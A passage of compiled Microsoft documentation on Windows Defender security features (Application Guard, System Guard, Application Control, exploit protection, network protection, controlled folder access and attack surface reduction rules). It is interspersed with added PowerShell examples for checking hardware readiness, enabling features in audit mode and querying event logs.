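    $logical = ($cpus | Measure-Object -Property NumberOfLogicalProcessors -Sum).Sum
    $memGB   = [math]::Round($cs.TotalPhysicalMemory / 1GB, 1)
    $freeGB  = [math]::Round($disk.FreeSpace / 1GB, 1)

    [pscustomobject]@{
        Is64Bit                = [Environment]::Is64BitOperatingSystem
        LogicalProcessors      = $logical
        MeetsCoreRequirement   = $logical -ge 4      # default SpecRequiredProcessorCount
        PhysicalMemoryGB       = $memGB
        MeetsMemoryRequirement = $memGB -ge 8        # default SpecRequiredMemoryInGB
        SystemDriveFreeGB      = $freeGB
        MeetsDiskRequirement   = $freeGB -ge 5       # default SpecRequiredFreeDiskSpaceInGB
        # SLAT (EPT/NPT) plus VT-x or AMD-V enabled in firmware; neither can be overridden.
        SlatSupported          = [bool]$cpu.SecondLevelAddressTranslationExtensions
        VirtualizationEnabled  = [bool]$cpu.VirtualizationFirmwareEnabled
        HypervisorPresent      = [bool]$cs.HypervisorPresent
    }
}

function Set-WdagSpecOverride {
    # Writes the three DWORDs named in the FAQ. Lowering them trades performance for
    # the ability to turn Application Guard on at all; the values here are examples.
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [ValidateRange(1, 64)]   [int]$ProcessorCount    = 2,
        [ValidateRange(1, 256)]  [int]$MemoryInGB        = 4,
        [ValidateRange(1, 1024)] [int]$FreeDiskSpaceInGB = 5
    )
    $key = 'HKLM:\SOFTWARE\Microsoft\Hvsi'
    if (-not (Test-Path -Path $key)) { New-Item -Path $key -Force | Out-Null }
    $values = @{
        SpecRequiredProcessorCount    = $ProcessorCount
        SpecRequiredMemoryInGB        = $MemoryInGB
        SpecRequiredFreeDiskSpaceInGB = $FreeDiskSpaceInGB
    }
    foreach ($name in $values.Keys) {
        if ($PSCmdlet.ShouldProcess("$key\$name", "Set DWORD to $($values[$name])")) {
            New-ItemProperty -Path $key -Name $name -PropertyType DWord `
                             -Value $values[$name] -Force | Out-Null
        }
    }
}

$readiness = Get-WdagHardwareReadiness
$readiness | Format-List

if (-not ($readiness.Is64Bit -and $readiness.SlatSupported -and $readiness.VirtualizationEnabled)) {
    Write-Warning 'SLAT or firmware virtualization support is missing; the override keys cannot help here.'
}
elseif (-not ($readiness.MeetsCoreRequirement -and $readiness.MeetsMemoryRequirement)) {
    # -WhatIf previews the registry writes; remove it to apply them.
    Set-WdagSpecOverride -ProcessorCount $readiness.LogicalProcessors `
                         -MemoryInGB ([int][math]::Floor($readiness.PhysicalMemoryGB)) -WhatIf
}
```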

Software requirements
Your environment needs the following software to run Windows Defender Application Guard.
SOFTWARE DESCRIPTION

Operating system: Windows 10 Enterprise edition, version 1709 or higher; Windows 10 Professional edition, version 1803 or higher; Windows 10 Professional for Workstations edition, version 1803 or higher; Windows 10 Professional Education edition, version 1803 or higher; Windows 10 Education edition, version 1903 or higher

Browser: Microsoft Edge and Internet Explorer

Management system: Microsoft Intune (only for managed devices), OR System Center Configuration Manager, OR Group Policy, OR your current company-wide 3rd party mobile device management (MDM) solution. For info about 3rd party MDM solutions, see the documentation that came with your product.

Windows Defender System Guard: How a hardware-based root of trust helps protect Windows 10
4/5/2019 • 5 minutes to read • Edit Online

In order to protect critical resources such as the Windows authentication stack, single sign-on tokens, the
Windows Hello biometric stack, and the Virtual Trusted Platform Module, a system's firmware and hardware must
be trustworthy.
Windows Defender System Guard reorganizes the existing Windows 10 system integrity features under one roof
and sets up the next set of investments in Windows security. It's designed to make these security guarantees:
Protect and maintain the integrity of the system as it starts up
Validate that system integrity has truly been maintained through local and remote attestation

Maintaining the integrity of the system as it starts

Static Root of Trust for Measurement (SRTM)
With Windows 7, one of the means attackers would use to persist and evade detection was to install what is often
referred to as a bootkit or rootkit on the system. This malicious software would start before Windows started, or
during the boot process itself, enabling it to start with the highest level of privilege.
With Windows 10 running on modern hardware (that is, Windows 8-certified or greater) a hardware-based root of
trust helps ensure that no unauthorized firmware or software (such as a bootkit) can start before the Windows
bootloader. This hardware-based root of trust comes from the device’s Secure Boot feature, which is part of the
Unified Extensible Firmware Interface (UEFI). This technique of measuring the static early boot UEFI components
is called the Static Root of Trust for Measurement (SRTM).
As there are thousands of PC vendors that produce numerous models with different UEFI BIOS versions, there
becomes an incredibly large number of SRTM measurements upon bootup. Two techniques exist to establish trust
here—either maintain a list of known 'bad' SRTM measurements (also known as a blacklist), or a list of known
'good' SRTM measurements (also known as a whitelist). Each option has a drawback:
A list of known 'bad' SRTM measurements allows a hacker to change just 1 bit in a component to create an
entirely new SRTM hash that needs to be listed. This means that the SRTM flow is inherently brittle - a minor
change can invalidate the entire chain of trust.
A list of known 'good' SRTM measurements requires each new BIOS/PC combination measurement to be
carefully added, which is slow. In addition, a bug fix for UEFI code can take a long time to design, build, retest,
validate, and redeploy.
Secure Launch—the Dynamic Root of Trust for Measurement (DRTM)
Windows Defender System Guard Secure Launch, first introduced in Windows 10 version 1809, aims to alleviate
these issues by leveraging a technology known as the Dynamic Root of Trust for Measurement (DRTM). DRTM
lets the system freely boot into untrusted code initially, but shortly after launches the system into a trusted state by
taking control of all CPUs and forcing them down a well-known and measured code path. This has the benefit of
allowing untrusted early UEFI code to boot the system, but then being able to securely transition into a trusted and
measured state.
Secure Launch simplifies management of SRTM measurements because the launch code is now unrelated to a
specific hardware configuration. This means the number of valid code measurements is small, and future updates
can be deployed more widely and quickly.
System Management Mode (SMM) protection
System Management Mode (SMM) is a special-purpose CPU mode in x86 microcontrollers that handles power
management, hardware configuration, thermal monitoring, and anything else the manufacturer deems useful.
Whenever one of these system operations is requested, a non-maskable interrupt (SMI) is invoked at runtime,
which executes SMM code installed by the BIOS. SMM code executes in the highest privilege level and is invisible
to the OS, which makes it an attractive target for malicious activity. Even if System Guard Secure Launch is used to
late launch, SMM code can potentially access hypervisor memory and change the hypervisor. To defend against
this, two techniques are used:
1. Paging protection to prevent inappropriate access to code and data
2. SMM hardware supervision and attestation
Paging protection can be implemented to lock certain code tables to be read-only to prevent tampering. This
prevents access to any memory that has not been specifically assigned.
A hardware-enforced processor feature known as a supervisor SMI handler can monitor the SMM and make sure
it does not access any part of the address space that it is not supposed to.
SMM protection is built on top of the Secure Launch technology and requires it to function. In the future,
Windows 10 will also measure this SMI Handler's behavior and attest that no OS-owned memory has been
tampered with.

Validating platform integrity after Windows is running (run time)

While Windows Defender System Guard provides advanced protection that will help protect and maintain the
integrity of the platform during boot and at run time, the reality is that we must apply an "assume breach"
mentality to even our most sophisticated security technologies. We should be able to trust that the technologies
are successfully doing their jobs, but we also need the ability to verify that they were successful in achieving their
goals. When it comes to platform integrity, we can’t just trust the platform, which potentially could be
compromised, to self-attest to its security state. So Windows Defender System Guard includes a series of
technologies that enable remote analysis of the device’s integrity.
As Windows 10 boots, a series of integrity measurements are taken by Windows Defender System Guard using
the device’s Trusted Platform Module 2.0 (TPM 2.0). System Guard Secure Launch will not support earlier TPM
versions, such as TPM 1.2. This process and data are hardware-isolated away from Windows to help ensure that
the measurement data is not subject to the type of tampering that could happen if the platform was compromised.
From here, the measurements can be used to determine the integrity of the device’s firmware, hardware
configuration state, and Windows boot-related components, just to name a few.

After the system boots, Windows Defender System Guard signs and seals these measurements using the TPM.
Upon request, a management system like Intune or System Center Configuration Manager can acquire them for
remote analysis. If Windows Defender System Guard indicates that the device lacks integrity, the management
system can take a series of actions, such as denying the device access to resources.

Windows Defender Application Control
4/5/2019 • 2 minutes to read • Edit Online

Applies to:
Windows 10
Windows Server 2016
Windows Server 2019
With thousands of new malicious files created every day, using traditional methods like antivirus solutions—
signature-based detection to fight against malware—provides an inadequate defense against new attacks. In most
organizations, information is the most valuable asset, and ensuring that only approved users have access to that
information is imperative.
However, when a user runs a process, that process has the same level of access to data that the user has. As a
result, sensitive information could easily be deleted or transmitted out of the organization if a user knowingly or
unknowingly runs malicious software.
Application control is a crucial line of defense for protecting enterprises given today’s threat landscape, and it has
an inherent advantage over traditional antivirus solutions. Specifically, application control moves away from the
traditional application trust model where all applications are assumed trustworthy by default to one where
applications must earn trust in order to run. Many organizations, like the Australian Signals Directorate, understand
this and frequently cite application control as one of the most effective means for addressing the threat of
executable file-based malware (.exe, .dll, etc.).
Windows Defender Application Control (WDAC) can help mitigate these types of security threats by restricting the
applications that users are allowed to run and the code that runs in the System Core (kernel). WDAC policies also
block unsigned scripts and MSIs, and Windows PowerShell runs in Constrained Language Mode.

NOTE
Prior to Windows 10, version 1709, Windows Defender Application Control was known as configurable code integrity policies.

WDAC System Requirements

WDAC policies can only be created on computers running Windows 10 Enterprise or Professional editions, or
Windows Server 2016. They can be applied to computers running any edition of Windows 10 or Windows
Server 2016 and optionally managed via Mobile Device Management (MDM), such as Microsoft Intune. Group
Policy or Intune can be used to distribute WDAC policies.

New and changed functionality

Prior to Windows 10, version 1709, Windows Defender Application Control was known as Windows Defender
Device Guard configurable code integrity policies.
Beginning with Windows 10, version 1703, you can use WDAC not only to control applications, but also to control
whether specific plug-ins, add-ins, and modules can run from specific apps (such as a line-of-business application
or a browser). For more information, see Use a Windows Defender Application Control policy to control specific
plug-ins, add-ins, and modules.
See also
WDAC design guide
WDAC deployment guide

Protect devices from exploits
4/8/2019 • 6 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Exploit protection automatically applies a number of exploit mitigation techniques to operating system processes
and apps.
It is part of Windows Defender Exploit Guard. Exploit protection is supported beginning with Windows 10,
version 1709 and Windows Server 2016, version 1803.

TIP
You can visit the Windows Defender Testground website at demo.wd.microsoft.com to confirm the feature is working and
see how it works.

Exploit protection works best with Windows Defender Advanced Threat Protection, which gives you detailed
reporting into exploit protection events and blocks as part of the usual alert investigation scenarios.
You can enable exploit protection on an individual machine, and then use Group Policy to distribute the XML file
to multiple devices at once.
When a mitigation is encountered on the machine, a notification will be displayed from the Action Center. You can
customize the notification with your company details and contact information. You can also enable the rules
individually to customize what techniques the feature monitors.
You can also use audit mode to evaluate how exploit protection would impact your organization if it were enabled.
Many of the features in the Enhanced Mitigation Experience Toolkit (EMET) have been included in Exploit
protection, and you can convert and import existing EMET configuration profiles into Exploit protection. See
Comparison between Enhanced Mitigation Experience Toolkit and Windows Defender Exploit Guard for more
information on how Exploit protection supersedes EMET and what the benefits are when considering moving to
exploit protection on Windows 10.

IMPORTANT
If you are currently using EMET you should be aware that EMET reached end of life on July 31, 2018. You should consider
replacing EMET with exploit protection in Windows 10. You can convert an existing EMET configuration file into exploit
protection to make the migration easier and keep your existing settings.

WARNING
Some security mitigation technologies may have compatibility issues with some applications. You should test exploit
protection in all target use scenarios by using audit mode before deploying the configuration across a production
environment or the rest of your network.
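The EMET migration, audit mode and XML distribution steps described above, as an added PowerShell example that is not part of the Microsoft documentation; it uses the ProcessMitigations module cmdlets ConvertTo-ProcessMitigationPolicy, Set-ProcessMitigation and Get-ProcessMitigation. The file paths, the executable names and the assumed layout of the converted XML (AppConfig elements keyed by an Executable attribute) are this example's assumptions.

```powershell
# Added example (not from the Microsoft documentation): migrate an EMET profile into
# exploit protection, put two mitigations into audit mode for a line-of-business app,
# and export the machine configuration for Group Policy distribution.
# Assumptions: elevated PowerShell on Windows 10 1709+ with the ProcessMitigations module;
# paths and executable names are placeholders; the converted XML is assumed to contain
# <AppConfig Executable="..."> elements whose child elements name the mitigations.

Import-Module ProcessMitigations

$emetProfile = 'C:\EMET\Popular Software.xml'            # existing EMET export (placeholder)
$converted   = 'C:\ExploitProtection\converted.xml'       # exploit protection format (placeholder)
$exported    = 'C:\ExploitProtection\machine-config.xml'  # file to distribute with Group Policy

# 1. Convert the EMET XML. Only settings with an exploit protection equivalent are carried over.
ConvertTo-ProcessMitigationPolicy -EMETFilePath $emetProfile -OutputFilePath $converted

# 2. Review what the converter produced before applying it: one row per executable,
#    listing the mitigation elements set for it.
[xml]$policy = Get-Content -Path $converted
$policy.MitigationPolicy.AppConfig |
    Select-Object Executable,
                  @{ Name = 'Mitigations'; Expression = { ($_.ChildNodes | ForEach-Object { $_.Name }) -join ', ' } } |
    Format-Table -AutoSize

# 3. Apply the converted per-app settings to this machine.
Set-ProcessMitigation -PolicyFilePath $converted

# 4. For an app EMET never covered, audit rather than enforce first: AuditDynamicCode logs
#    what ACG would block (event ID 1 in the table below) and AuditChildProcess logs child
#    process creation (event ID 3) without interrupting the app.
Set-ProcessMitigation -Name 'contoso-lob.exe' -Enable AuditDynamicCode, AuditChildProcess

# 5. Verify the effective settings for that executable.
Get-ProcessMitigation -Name 'contoso-lob.exe'

# 6. Export the full current configuration. Once audit mode review is done, this XML is what
#    you distribute through Group Policy ("Use a common set of exploit protection settings").
Get-ProcessMitigation -RegistryConfigFilePath $exported
```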

Review exploit protection events in Windows Event Viewer

You can review the Windows event log to see events that are created when exploit protection blocks (or audits) an
app:

PROVIDER/SOURCE EVENT ID DESCRIPTION

Security-Mitigations, event ID 1: ACG audit
Security-Mitigations, event ID 2: ACG enforce
Security-Mitigations, event ID 3: Do not allow child processes audit
Security-Mitigations, event ID 4: Do not allow child processes block
Security-Mitigations, event ID 5: Block low integrity images audit
Security-Mitigations, event ID 6: Block low integrity images block
Security-Mitigations, event ID 7: Block remote images audit
Security-Mitigations, event ID 8: Block remote images block
Security-Mitigations, event ID 9: Disable win32k system calls audit
Security-Mitigations, event ID 10: Disable win32k system calls block
Security-Mitigations, event ID 11: Code integrity guard audit
Security-Mitigations, event ID 12: Code integrity guard block
Security-Mitigations, event ID 13: EAF audit
Security-Mitigations, event ID 14: EAF enforce
Security-Mitigations, event ID 15: EAF+ audit
Security-Mitigations, event ID 16: EAF+ enforce
Security-Mitigations, event ID 17: IAF audit
Security-Mitigations, event ID 18: IAF enforce
Security-Mitigations, event ID 19: ROP StackPivot audit
Security-Mitigations, event ID 20: ROP StackPivot enforce
Security-Mitigations, event ID 21: ROP CallerCheck audit
Security-Mitigations, event ID 22: ROP CallerCheck enforce
Security-Mitigations, event ID 23: ROP SimExec audit
Security-Mitigations, event ID 24: ROP SimExec enforce
WER-Diagnostics, event ID 5: CFG Block
Win32K, event ID 260: Untrusted Font

Comparison between Enhanced Mitigation Experience Toolkit and Windows Defender Exploit Guard

IMPORTANT
If you are currently using EMET, you should be aware that EMET reached end of life on July 31, 2018. You should consider
replacing EMET with exploit protection in Windows Defender ATP.
You can convert an existing EMET configuration file into exploit protection to make the migration easier and keep your
existing settings.

This section compares exploit protection in Windows Defender ATP with the Enhanced Mitigation Experience
Toolkit (EMET) for reference. The table in this section illustrates the differences between EMET and Windows
Defender Exploit Guard.

WINDOWS DEFENDER EXPLOIT GUARD EMET

Windows versions
  Windows Defender Exploit Guard: All versions of Windows 10 starting with version 1709
  EMET: Windows 8.1; Windows 8; Windows 7. Cannot be installed on Windows 10, version 1709 and later

Installation requirements
  Windows Defender Exploit Guard: Windows Security in Windows 10 (no additional installation required). Windows Defender Exploit Guard is built into Windows - it doesn't require a separate tool or package for management, configuration, or deployment.
  EMET: Available only as an additional download and must be installed onto a management device

User interface
  Windows Defender Exploit Guard: Modern interface integrated with the Windows Security app
  EMET: Older, complex interface that requires considerable ramp-up training

Supportability
  Windows Defender Exploit Guard: Dedicated submission-based support channel[1]. Part of the Windows 10 support lifecycle
  EMET: Ends after July 31, 2018

Updates
  Windows Defender Exploit Guard: Ongoing updates and development of new features, released twice yearly as part of the Windows 10 semi-annual update channel
  EMET: No planned updates or development

Exploit protection
  Windows Defender Exploit Guard: All EMET mitigations plus new, specific mitigations (see table). Can convert and import existing EMET configurations
  EMET: Limited set of mitigations

Attack surface reduction[2]
  Windows Defender Exploit Guard: Helps block known infection vectors. Can configure individual rules
  EMET: Limited ruleset configuration only for modules (no processes)

Network protection[2]
  Windows Defender Exploit Guard: Helps block malicious network connections
  EMET: Not available

Controlled folder access[2]
  Windows Defender Exploit Guard: Helps protect important folders. Configurable for apps and folders
  EMET: Not available

Configuration with GUI (user interface)
  Windows Defender Exploit Guard: Use Windows Security app to customize and manage configurations
  EMET: Requires installation and use of EMET tool

Configuration with Group Policy
  Windows Defender Exploit Guard: Use Group Policy to deploy and manage configurations
  EMET: Available

Configuration with shell tools
  Windows Defender Exploit Guard: Use PowerShell to customize and manage configurations
  EMET: Requires use of EMET tool (EMET_CONF)

System Center Configuration Manager
  Windows Defender Exploit Guard: Use Configuration Manager to customize, deploy, and manage configurations
  EMET: Not available

Microsoft Intune
  Windows Defender Exploit Guard: Use Intune to customize, deploy, and manage configurations
  EMET: Not available

Reporting
  Windows Defender Exploit Guard: With Windows event logs and full audit mode reporting. Full integration with Windows Defender Advanced Threat Protection
  EMET: Limited Windows event log monitoring

Audit mode
  Windows Defender Exploit Guard: Full audit mode with Windows event reporting
  EMET: Limited to EAF, EAF+, and anti-ROP mitigations

(1) Requires an enterprise subscription with Azure Active Directory or a Software Assurance ID.
(2) Additional requirements may apply (such as use of Windows Defender Antivirus). See Windows Defender
Exploit Guard requirements for more details. Customizable mitigation options that are configured with exploit
protection do not require Windows Defender Antivirus.
(1) Requires an enterprise subscription with Azure Active Directory or a Software Assurance ID.
(2) Additional requirements may apply (such as use of Windows Defender Antivirus). See Windows Defender
Exploit Guard requirements for more details. Customizable mitigation options that are configured with exploit
protection do not require Windows Defender Antivirus.

Mitigation comparison
The mitigations available in EMET are included in Windows Defender Exploit Guard, under the exploit protection
feature.
The table in this section indicates the availability and support of native mitigations between EMET and exploit
protection.
MITIGATION / AVAILABLE IN WINDOWS DEFENDER EXPLOIT GUARD / AVAILABLE IN EMET

Arbitrary code guard (ACG): As "Memory Protection Check"
Block remote images: As "Load Library Check"
Block untrusted fonts
Data Execution Prevention (DEP)
Export address filtering (EAF)
Force randomization for images (Mandatory ASLR)
NullPage Security Mitigation: Included natively in Windows 10. See Mitigate threats by using Windows 10 security features for more information
Randomize memory allocations (Bottom-Up ASLR)
Simulate execution (SimExec)
Validate API invocation (CallerCheck)
Validate exception chains (SEHOP)
Validate stack integrity (StackPivot)
Certificate trust (configurable certificate pinning): Windows 10 provides enterprise certificate pinning
Heap spray allocation: Ineffective against newer browser-based exploits; newer mitigations provide better protection. See Mitigate threats by using Windows 10 security features for more information
Block low integrity images
Code integrity guard
Disable extension points
Disable Win32k system calls
Do not allow child processes
Import address filtering (IAF)
Validate handle usage
Validate heap integrity
Validate image dependency integrity

NOTE
The Advanced ROP mitigations that are available in EMET are superseded by ACG in Windows 10, while other EMET
advanced settings are enabled by default in Windows Defender Exploit Guard as part of enabling the anti-ROP mitigations
for a process.
See Mitigate threats by using Windows 10 security features for more information on how Windows 10 employs
existing EMET technology.

Related topics
Protect devices from exploits
Evaluate exploit protection
Enable exploit protection
Configure and audit exploit protection mitigations
Import, export, and deploy exploit protection configurations
Troubleshoot exploit protection

Protect your network
5/1/2019 • 2 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Network protection helps reduce the attack surface of your devices from Internet-based events. It prevents
employees from using any application to access dangerous domains that may host phishing scams, exploits, and
other malicious content on the Internet.
It expands the scope of Windows Defender SmartScreen to block all outbound HTTP(S) traffic that attempts to
connect to low-reputation sources (based on the domain or hostname).
Network protection is supported beginning with Windows 10, version 1709.

TIP
You can visit the Windows Defender Testground website at demo.wd.microsoft.com to confirm the feature is working and
see how it works.

Network protection works best with Windows Defender Advanced Threat Protection, which gives you detailed reporting into Windows Defender Exploit Guard events and blocks as part of the usual alert investigation scenarios.
When network protection blocks a connection, a notification is displayed from the Action Center. You can customize the notification with your company details and contact information.
You can also use audit mode to evaluate how network protection would impact your organization if it were enabled.

Requirements
Network protection requires Windows 10 Pro, Enterprise E3, or E5 and Windows Defender AV real-time protection.

WINDOWS 10 VERSION                  WINDOWS DEFENDER ANTIVIRUS
Windows 10 version 1709 or later    Windows Defender AV real-time protection and cloud-delivered protection must be enabled
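The requirements above are the two things that silently break a network protection rollout: if real-time protection or cloud-delivered protection is off, the feature does nothing and no 1125/1126 events appear. The following PowerShell is an added example, not part of the original page, that checks both prerequisites before switching network protection to audit mode (the mode recommended above for evaluation). It assumes the Defender PowerShell module (Get-MpComputerStatus, Get-MpPreference, Set-MpPreference) on Windows 10, version 1709 or later, run from an elevated prompt.

```powershell
# Added example (not from the page): gate network protection on its prerequisites,
# then enable it in audit mode. Assumes the built-in Defender module, elevated.

function Test-NetworkProtectionPrerequisites {
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference
    [pscustomobject]@{
        RealTimeProtection = [bool]$status.RealTimeProtectionEnabled
        # MAPSReporting: 0 = disabled, 1 = basic, 2 = advanced; anything but 0 is cloud-delivered protection
        CloudDelivered     = ($pref.MAPSReporting -ne 0)
        # EnableNetworkProtection: 0 = Disabled, 1 = Enabled (block), 2 = AuditMode
        CurrentMode        = $pref.EnableNetworkProtection
    }
}

function Enable-NetworkProtectionAudit {
    $check = Test-NetworkProtectionPrerequisites
    if (-not $check.RealTimeProtection -or -not $check.CloudDelivered) {
        # Fail loudly instead of configuring a feature that cannot fire.
        throw "Prerequisites not met: RealTimeProtection=$($check.RealTimeProtection) CloudDelivered=$($check.CloudDelivered)"
    }
    # AuditMode writes event 1125 for each would-be block without interrupting users;
    # change to Enabled once the audit data has been reviewed.
    Set-MpPreference -EnableNetworkProtection AuditMode
    Test-NetworkProtectionPrerequisites
}

Enable-NetworkProtectionAudit
```

Run it once per machine (or through your management tool) and keep the returned object; CurrentMode should read 2 after the call, and the two boolean fields tell you why a machine produced no audit events if it did not.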

Review network protection events in Windows Defender Security Center
Windows Defender ATP provides detailed reporting into events and blocks as part of its alert investigation
scenarios.
You can query Windows Defender ATP data by using Advanced hunting. If you're using audit mode, you can use
Advanced hunting to see how network protection settings would affect your environment if they were enabled.

Review network protection events in Windows Event Viewer


You can review the Windows event log to see events that are created when network protection blocks (or audits) access to a malicious IP or domain:
1. Type Event viewer in the Start menu to open the Windows Event Viewer.
2. On the left panel, under Actions, click Import custom view....
3. Select a saved custom view XML file for network protection, or copy the XML directly.
4. Click OK.
5. This will create a custom view that filters to only show the following events related to network protection:

EVENT ID   DESCRIPTION
5007       Event when settings are changed
1125       Event when network protection fires in audit mode
1126       Event when network protection fires in block mode

Related topics
Evaluate network protection: Undertake a quick scenario that demonstrates how the feature works, and what events would typically be created.
Enable network protection: Use Group Policy, PowerShell, or MDM CSPs to enable and manage network protection in your network.
Protect important folders with controlled folder
access
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Controlled folder access helps you protect valuable data from malicious apps and threats, such as ransomware. Controlled folder access is supported on Windows 10, version 1709 and later, and on Windows Server 2019. It works best with Windows Defender Advanced Threat Protection, which gives you detailed reporting into controlled folder access events and blocks as part of the usual alert investigation scenarios.
All apps (any executable file, including .exe, .scr, .dll files and others) are assessed by Windows Defender Antivirus, which then determines if the app is malicious or safe. If the app is determined to be malicious or suspicious, it is not allowed to make changes to any files in any protected folder.
This is especially useful in helping to protect your documents and information from ransomware that attempts to encrypt your files and hold them hostage.
A notification appears on the computer where the app attempted to make changes to a protected folder. You can customize the notification with your company details and contact information.
The protected folders include common system folders, and you can add additional folders. You can also allow (whitelist) specific apps to give them access to the protected folders.
You can use audit mode to evaluate how controlled folder access would impact your organization if it were enabled. You can also visit the Windows Defender Testground website at demo.wd.microsoft.com to confirm the feature is working and see how it works.

Requirements
Controlled folder access requires enabling Windows Defender Antivirus real-time protection.

Review controlled folder access events in Windows Defender Security Center
Windows Defender ATP provides detailed reporting into events and blocks as part of its alert investigation
scenarios.
You can query Windows Defender ATP data by using Advanced hunting. If you're using audit mode, you can use
Advanced hunting to see how controlled folder access settings would affect your environment if they were
enabled.

Review controlled folder access events in Windows Event Viewer


You can review the Windows event log to see events that are created when controlled folder access blocks (or
audits) an app:
1. Download the Exploit Guard Evaluation Package and extract the file cfa-events.xml to an easily accessible location on the machine.
2. Type Event viewer in the Start menu to open the Windows Event Viewer.
3. On the left panel, under Actions, click Import custom view....
4. Navigate to where you extracted cfa-events.xml and select it. Alternatively, copy the XML directly.
5. Click OK.
6. This will create a custom view that filters to only show the following events related to controlled folder access:

EVENT ID   DESCRIPTION
5007       Event when settings are changed
1124       Audited controlled folder access event
1123       Blocked controlled folder access event

In this section
Evaluate controlled folder access: Use a dedicated demo tool to see how controlled folder access works, and what events would typically be created.
Enable controlled folder access: Use Group Policy, PowerShell, or MDM CSPs to enable and manage controlled folder access in your network.
Customize controlled folder access: Add additional protected folders, and allow specified apps to access protected folders.
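The three topics above (enable, add protected folders, allow apps) are one procedure in practice. The following PowerShell is an added example and not code from the original page: it turns on controlled folder access in audit mode, appends a protected folder and an allowed application, and reads the resulting state back so the change can be verified on the machine. It assumes the Defender PowerShell module on Windows 10, version 1709 or later, run elevated; the folder and application paths are placeholders, not values from the page.

```powershell
# Added example (not from the page): configure controlled folder access in audit mode.
# Assumes the Defender module, elevated prompt; paths below are placeholders.

function Get-ControlledFolderAccessState {
    $p = Get-MpPreference
    [pscustomobject]@{
        # EnableControlledFolderAccess: 0 = Disabled, 1 = Enabled (block), 2 = AuditMode
        Mode             = $p.EnableControlledFolderAccess
        ProtectedFolders = @($p.ControlledFolderAccessProtectedFolders)
        AllowedApps      = @($p.ControlledFolderAccessAllowedApplications)
    }
}

function Set-ControlledFolderAccessAudit {
    param(
        [string[]]$ProtectedFolders = @('D:\Finance\Ledgers'),            # placeholder path
        [string[]]$AllowedApps      = @('C:\Program Files\LOB\Ledger.exe') # placeholder app
    )
    # Requirement from this page: Windows Defender AV real-time protection must be on.
    if (-not (Get-MpComputerStatus).RealTimeProtectionEnabled) {
        throw 'Controlled folder access requires Windows Defender AV real-time protection.'
    }
    # AuditMode records event 1124 for each write a protected folder would have refused.
    Set-MpPreference -EnableControlledFolderAccess AuditMode
    # Add-MpPreference appends to the existing lists; Set-MpPreference with the same
    # parameters would replace them, which is how custom folders get lost by accident.
    Add-MpPreference -ControlledFolderAccessProtectedFolders $ProtectedFolders
    Add-MpPreference -ControlledFolderAccessAllowedApplications $AllowedApps
    Get-ControlledFolderAccessState
}

Set-ControlledFolderAccessAudit
```

ProtectedFolders in the returned object lists only the folders you added; the common system folders the page mentions are protected regardless and do not appear in that list. Review the 1124 audit events for the allowed-app list before moving Mode to Enabled.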
Reduce attack surfaces with attack surface reduction
rules
4/19/2019 • 10 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Attack surface reduction rules help prevent behaviors malware often uses to infect computers with malicious code. You can set attack surface reduction rules for computers running Windows 10, version 1709 or later, Windows Server, version 1803 or later, or Windows Server 2019.
To use attack surface reduction rules, you need a Windows 10 Enterprise E3 license or higher. A Windows E5 license gives you the advanced management capabilities to power them. These include monitoring, analytics, and workflows available in Windows Defender Advanced Threat Protection, as well as reporting and configuration capabilities in the Microsoft 365 security center. These advanced capabilities aren't available with an E3 license, but you can use attack surface reduction rule events in Event Viewer to help facilitate deployment.
Attack surface reduction rules target behaviors that malware and malicious apps typically use to infect computers,
including:
Executable files and scripts used in Office apps or web mail that attempt to download or run files
Obfuscated or otherwise suspicious scripts
Behaviors that apps don't usually initiate during normal day-to-day work
You can use audit mode to evaluate how attack surface reduction rules would impact your organization if they
were enabled. It's best to run all rules in audit mode first so you can understand their impact on your line-of-
business applications. Many line-of-business applications are written with limited security concerns, and they
may perform tasks similar to malware. By monitoring audit data and adding exclusions for necessary
applications, you can deploy attack surface reduction rules without impacting productivity.
Triggered rules display a notification on the device. You can customize the notification with your company details and contact information. The notification also displays in Windows Defender Security Center and in the Microsoft 365 security center.
For information about configuring attack surface reduction rules, see Enable attack surface reduction rules.

Review attack surface reduction events in Windows Event Viewer


You can review the Windows event log to view events that are created when attack surface reduction rules fire:
1. Download the Exploit Guard Evaluation Package and extract the custom view XML file for attack surface reduction rules to an easily accessible location on the machine.
2. Type Event Viewer in the Start menu to open the Windows Event Viewer.
3. Click Import custom view... on the left panel, under Actions.
4. Select the extracted XML file. Alternatively, copy the XML directly.
5. Click OK.
This will create a custom view that filters to only show the following events related to attack surface reduction rules:

EVENT ID   DESCRIPTION
5007       Event when settings are changed
1121       Event when rule fires in Block-mode
1122       Event when rule fires in Audit-mode
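The three event-review procedures on this page (network protection, controlled folder access, and attack surface reduction rules) all end in the same place: a filtered view of the Windows Defender AV operational log. The following PowerShell is an added example, not part of the original page, that does the same filtering from a prompt using the event IDs from the three tables, so audit-mode events can be rolled up across many machines before any feature is switched to block mode. It assumes the Defender operational log channel name (Microsoft-Windows-Windows Defender/Operational), which the page does not state, and the standard Get-WinEvent cmdlet; the time windows are arbitrary.

```powershell
# Added example (not from the page): query network protection, controlled folder
# access and ASR events by the event IDs listed on this page.
# Assumption: Defender writes these to Microsoft-Windows-Windows Defender/Operational.

$LogName = 'Microsoft-Windows-Windows Defender/Operational'

# Event ID -> feature and mode, taken from the three tables on this page
$EventMap = @{
    5007 = 'Settings changed'
    1125 = 'Network protection (audit)'
    1126 = 'Network protection (block)'
    1124 = 'Controlled folder access (audit)'
    1123 = 'Controlled folder access (block)'
    1122 = 'ASR rule (audit)'
    1121 = 'ASR rule (block)'
}

function Get-ExploitGuardEvents {
    param(
        [int]$Days = 7,
        [int[]]$Ids = @($EventMap.Keys)
    )
    $filter = @{ LogName = $LogName; Id = $Ids; StartTime = (Get-Date).AddDays(-$Days) }
    # Get-WinEvent raises an error, not an empty result, when nothing matches.
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Id      = $_.Id
                Feature = $EventMap[$_.Id]
                # The message carries the process, the path or domain and, for ASR, the rule GUID.
                Message = ($_.Message -replace '\s+', ' ')
            }
        }
}

# Audit-mode rollup: which feature would have blocked the most in the last 30 days.
Get-ExploitGuardEvents -Days 30 -Ids 1125, 1124, 1122 |
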